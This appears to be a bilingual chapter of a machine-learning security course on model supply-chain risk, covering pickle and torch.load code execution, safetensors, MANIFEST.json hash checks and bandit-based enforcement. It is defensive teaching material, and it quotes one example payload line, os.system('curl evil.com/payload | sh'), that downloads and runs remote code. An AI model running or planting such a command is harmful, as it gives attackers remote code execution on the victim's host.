English · Español

02 — Supply chain: pickle, safetensors, MANIFEST.json¶

🇪🇸 La cadena de suministro es todo lo que cargamos desde disco — pesos del modelo, tokenizador, índices RAG. pickle es un intérprete Python serializado: torch.load(ruta_no_confiable) ejecuta código arbitrario por diseño. La alternativa es safetensors (solo datos, sin código) + un MANIFEST.json con SHA256 por artefacto, verificado por scripts/verify_artifacts.sh antes de cualquier carga.

What "supply chain" means for this system¶

Every persisted artifact loaded at runtime is part of the supply chain:

Artifact	Path (per phases 11–32)	Risk class
Tokenizer (BPE merges + vocab)	`artifacts/tokenizer/`	Medium (JSON; integrity-only)
Model weights	`artifacts/checkpoints/mini-gpt-grammar.{pt,safetensors}`	High (deserialization)
RAG embeddings index	`artifacts/rag/index/`	Medium (binary; integrity-only)
RAG knowledge-base chunks	`data/kb/grammar-rules/chunks.jsonl`	Medium (JSON; content-integrity)
Hypothesis fuzz corpus	`.hypothesis/`	Low (test-time only)

The "supply chain" is the answer to: if I trust nothing about who put these files on disk, what can go wrong?

Pickle: the worst-case load¶

Python's pickle module is not a data format; it's a serialized program. When you call pickle.load(f), the pickle VM walks a sequence of opcodes that can:

Allocate objects.
Call arbitrary callables (including os.system, subprocess.run, eval).
Import arbitrary modules.

A pickle byte sequence that calls os.system("curl evil.com/payload | sh") during deserialization is trivial to construct. There is no flag to "load data only" — that's not what pickle does.

torch.load wraps pickle. So:

import torch
# Hostile checkpoint downloaded from a model hub:
state = torch.load("downloaded.pt")     # ← arbitrary code executes here
model.load_state_dict(state)            # ← reached only if RCE didn't drop a shell

The chance of RCE on torch.load(untrusted_path) is 100% if the file is hostile. Not "it depends on the model architecture." Not "if you have weird tensors." A hostile file is defined as one that runs code on load; the file format permits it; the loader honors it.

What "untrusted path" means¶

The path is untrusted if any of the following hold:

The file was downloaded from a public hub (Hugging Face, Civitai, a random GitHub release).
The file was emailed, dropped into a shared drive, or attached to a PR.
The file is on a host another user can write to without your review.
The file was downloaded a year ago; you don't remember verifying it.

Trust is a property of provenance and integrity, not of the act of having the file on disk.

Safetensors: data only, no code¶

safetensors is a format designed specifically to be safe to deserialize:

The header is a JSON object: tensor name → {dtype, shape, offsets}.
The body is raw bytes for each tensor, in the declared dtype/shape.
The loader never instantiates Python objects beyond plain tensors.

There is no opcode, no callable, no import, no __reduce__. The loader reads bytes into a tensor. End of trust boundary.

from safetensors.torch import load_file
state = load_file("downloaded.safetensors")   # just tensors, no code path to RCE

A hostile .safetensors file can still lie about its contents — wrong shape, wrong values, NaN-poisoned weights that degrade quality. That's an integrity attack, not an RCE. Caught downstream by:

Shape checks at load_state_dict.
MANIFEST.json SHA256 verification (below).
Behavioral tests after load (Phase 20's harness will flag a degraded model).

Trade: safetensors gives up the convenience of "pickle anything Python can pickle" and gains a hard guarantee against RCE-on-load.

MANIFEST.json: integrity for everything else¶

Even with safetensors, you still need to know: is this file the one I expect, or was it swapped?

Phase 18 emits MANIFEST.json at the end of each training run:

{
  "generated_at": "2026-05-22T14:31:08Z",
  "git_sha": "a1b2c3d…",
  "artifacts": [
    {
      "path": "artifacts/checkpoints/mini-gpt-grammar.safetensors",
      "sha256": "8f2a…cc91",
      "bytes": 4194304,
      "role": "model-weights"
    },
    {
      "path": "artifacts/tokenizer/vocab.json",
      "sha256": "1d3c…0a87",
      "bytes": 16384,
      "role": "tokenizer-vocab"
    },
    {
      "path": "data/kb/grammar-rules/chunks.jsonl",
      "sha256": "4e7b…b21f",
      "bytes": 102400,
      "role": "rag-kb"
    }
  ]
}

scripts/verify_artifacts.sh (Lab 04):

Walks artifacts[].
For each entry: computes sha256sum <path>.
Compares to the stored sha256.
Exits 0 if all match. Exits non-zero with a clear message naming the mismatched file.

This catches:

Bit rot on disk.
An attacker swapping chunks.jsonl for a poisoned version.
A teammate accidentally overwriting weights with an older checkpoint.

It does not catch:

An attacker who also rewrites MANIFEST.json. (Mitigation: GPG-sign MANIFEST.json, store the public key out-of-band. Phase 37's lab leaves signing as a stretch goal.)
Logic bugs in the artifacts. (Mitigation: behavioral tests, Phase 20.)

The manifest is a tripwire, not a fortress. But it's a cheap tripwire that catches the common cases (rot, accidental overwrite, naive tampering).

The threat in numbers¶

A quick sanity check, not a measurement:

Probability that a random hub checkpoint is hostile: low but non-zero. Documented incidents exist (PoisonGPT, public bandit-scanner findings on HF in 2023–2024).
Severity if a hostile checkpoint runs: 5/5 (full RCE on the host as the user running the load).
Detection probability without tooling: ~0% (nothing visible during load).
Detection probability with MANIFEST.json + safetensors-only policy: high for naive tampering, moderate for sophisticated tampering (the attacker would need to compromise both file and manifest and signing key if signed).

Residual risk after the policy: low for this single-user, local-only deployment. Higher for any multi-user deployment, which Phase 37 explicitly does not cover.

The enforcement: bandit + custom rule¶

The policy "no pickle-based loads in agent code" is enforced two ways:

bandit rule B301 — flags pickle.load and friends in src/.
Custom rule — flags torch.load( without an explicit weights_only=True argument. (Even with weights_only=True, prefer safetensors; the flag is a defense-in-depth, not the primary defense.)

just security runs both as part of CI. A new use of pickle requires a per-line # nosec with a justification comment, code review, and an entry in security/THREATS.md.

One-paragraph recap¶

The model-load path is the single highest-severity supply-chain risk in any ML system: torch.load on an untrusted pickle is RCE by design. The fix is two-layered: switch to safetensors (no code path to execute) and verify everything against MANIFEST.json SHA256 hashes (catch tampering and rot). Enforcement is via bandit + a custom rule, with scripts/verify_artifacts.sh as the runtime tripwire.

Next: theory/03-threat-modeling-numbers.md — the prob × severity × (1 − detection) matrix.